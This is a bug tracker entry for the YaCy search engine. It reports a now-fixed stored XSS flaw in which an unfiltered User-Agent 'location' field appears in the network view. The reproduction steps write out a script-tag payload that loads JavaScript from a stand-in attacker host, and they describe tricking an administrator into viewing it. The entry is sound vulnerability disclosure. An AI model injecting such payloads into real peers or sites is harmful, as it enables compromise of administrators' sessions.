| View Issue Details [ Jump to Notes ] | [ Issue History ] [ Print ] |
| ID | Project | Category | View Status | Date Submitted | Last Update |
| 0000204 | YaCy | Wishlist - Wunschliste | public | 2012-08-03 23:08 | 2021-10-13 05:44 |
|
| Reporter | soultcer | |
| Assigned To | Lotus | |
| Priority | normal | Severity | minor | Reproducibility | have not tried |
| Status | resolved | Resolution | fixed | |
| ETA | none | |
| Platform | | OS | | OS Version | |
| Product Version | YaCy 1.0 | |
| Target Version | | Fixed in Version | YaCy 1.1 | |
|
| Summary | 0000204: XSS attack YaCy peers using modified User-Agent string |
| Description | YaCy extracts the "location" from the User-Agent string. This "location" is displayed without any filter in the network view. |
| Steps To Reproduce | 1) Modify rogue YaCy instance to report it's own User-Agent as 'yacybot (freeworld/global; <script type="text/javascript" src="http://badsite.example/xss.js"></script> [^])'
2) Contact target peer with rogue YaCy instance.
3) Trick administrator of target peer to visit his network view. |
| Tags | No tags attached. |
|
| Attached Files | |
|
Relationships 
Relationships 